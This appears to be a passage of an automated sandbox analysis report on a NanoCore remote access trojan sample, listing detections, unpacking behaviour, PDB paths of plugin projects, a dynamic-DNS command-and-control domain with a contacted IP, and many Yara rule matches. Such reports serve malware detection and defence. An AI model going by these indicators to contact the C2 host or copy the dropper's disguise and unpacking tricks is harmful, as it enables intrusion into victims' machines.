        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: bGf2H3tXGg.exeJoe Sandbox ML: detected
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.2.dhcpmon.exe.2430000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.1.dhcpmon.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.2.dhcpmon.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 17.2.dhcpmon.exe.4a60000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.1.bGf2H3tXGg.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 17.2.dhcpmon.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7

        Compliance:

        barindex
        Detected unpacking (creates a PE file in dynamic memory)Show sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.2430000.4.unpack
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 3.2.bGf2H3tXGg.exe.400000.1.unpack
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 14.2.bGf2H3tXGg.exe.400000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 17.2.dhcpmon.exe.400000.1.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.400000.1.unpack
        Source: bGf2H3tXGg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: bGf2H3tXGg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_00404A29 FindFirstFileExW,3_1_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_00404A29 FindFirstFileExW,14_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_00404A29 FindFirstFileExW,14_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_00404A29 FindFirstFileExW,17_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00404A29 FindFirstFileExW,22_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_00404A29 FindFirstFileExW,22_1_00404A29

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: backu4734.duckdns.org
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: backu4734.duckdns.org
        Source: global trafficTCP traffic: 192.168.2.5:49708 -> 40.71.91.165:8092
        Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
        Source: unknownDNS traffic detected: queries for: backu4734.duckdns.org
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpString found in binary or memory: http://google.com
        Source: bGf2H3tXGg.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: bGf2H3tXGg.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
        Source: bGf2H3tXGg.exe, 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339271124.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323888903.00000000025B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
